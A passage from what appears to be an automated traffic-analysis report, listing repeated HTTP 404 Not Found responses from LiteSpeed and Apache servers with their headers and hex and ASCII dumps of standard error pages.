31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 26 Sep 2024 07:24:44 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 26 Sep 2024 07:24:46 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 26 Sep 2024 07:24:49 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:13 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:16 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:18 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:21 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:27 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:27 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:27 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:29 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 